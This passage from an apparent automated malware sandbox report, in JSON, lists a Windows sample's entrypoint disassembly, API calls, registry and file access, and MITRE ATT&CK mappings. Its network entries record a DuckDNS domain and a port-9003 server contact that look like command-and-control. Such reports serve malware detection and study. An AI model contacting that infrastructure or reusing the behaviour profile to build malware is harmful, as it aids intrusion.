\"call\t0x432beb,jmp\t0x43263c,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\tesi,push\t0x17,call\t0x4542da,test\teax, eax,je\t0x4327c9,mov\tecx, dword ptr [ebp + 8],int\t0x29,xor\tesi, esi,lea\teax, [ebp - 0x324],push\t0x2cc,push\tesi,push\teax,mov\tdword ptr [0x46ed04], esi,call\t0x434c30,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"\n \"DISMHOST.EXE.67A9C5A4.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74420000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"SSPICLI.DLL\" at base 75450000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"RPCRT4.DLL\" at base 76340000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"KERNEL32.DLL\" at base 76450000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 76a30000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74f90000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74af0000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74f80000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"DNSAPI.DLL\" at base 74e50000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"IPHLPAPI.DLL\" at base 73920000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"RASADHLP.DLL\" at base 71c30000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73890000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"SHELL32.DLL\" at base 76a70000\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"OLE32.DLL\" at base 75cf0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-sysinfo-l1-2-1 (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadLibrary\" with a parameter C:\\0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" failed to load missing module \"api-ms-win-core-sysinfo-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76340000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005948)\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005948)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e446a@ADVAPI32.dll\"\n \"0e000f00703f446a@ADVAPI32.dll\"\n \"0e000f00cc3f446a@ADVAPI32.dll\"\n \"11001200b447446a@ADVAPI32.dll\"\n \"110012004848446a@ADVAPI32.dll\"\n \"120013008c48446a@ADVAPI32.dll\"\n \"12001300e448446a@ADVAPI32.dll\"\n \"14001500386e446a@ADVAPI32.dll\"\n \"14001500506e446a@ADVAPI32.dll\"\n \"14001500686e446a@ADVAPI32.dll\"\n \"17001800806e446a@ADVAPI32.dll\"\n \"0d000e00986e446a@ADVAPI32.dll\"\n \"11001200a86e446a@ADVAPI32.dll\"\n \"11001200bc6e446a@ADVAPI32.dll\"\n \"0d000e004466446a@WININET.dll\"\n \"0d000e00b466446a@WININET.dll\"\n \"10001100ec66446a@WININET.dll\"\n \"100011009067446a@WININET.dll\"\n \"10001100006f446a@WININET.dll\"\n \"10001100146f446a@WININET.dll\"\n \"14001500286f446a@WININET.dll\"\n \"14001500406f446a@WININET.dll\"\n \"12001300586f446a@WININET.dll\"\n \"120013006c6f446a@WININET.dll\"\n \"10001100d067446a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"DISMHOST.EXE.67A9C5A4.bin\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A9C5A4.bin\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"DISMHOST.EXE.67A9C5A4.bin\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:9003\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"tristansupport.duckdns.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"DISMHOST.EXE.67A9C5A4.bin\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has an executable section named \".text\"\n \"DISMHOST.EXE.67A9C5A4.bin\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has an writable section named \".data\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has an writable section named \".tls\"\n \"DISMHOST.EXE.67A9C5A4.bin\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"DISMHOST.EXE.67A9C5A4.bin\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0\" was detected as \"VC8 -> Microsoft Corporation\"\n \"DISMHOST.EXE.67A9C5A4.bin\" was detected as \"Visual C++ 2005 Release -> Microsoft\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-sysinfo-l1-2-1.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\DNSAPI.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\rasadhlp.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\WINMM.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\version.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe.Local\\\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe.Local\\\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" trying to access non-existent file \"C:\\0175D5836AE47664425A5957A2C9A6D425D20C104B008EC4B38F9DC60BA5D7A0.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"0175d5836ae47664425a5957a2c9a6d425d20c104b008ec4b38f9dc60ba5d7a0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: 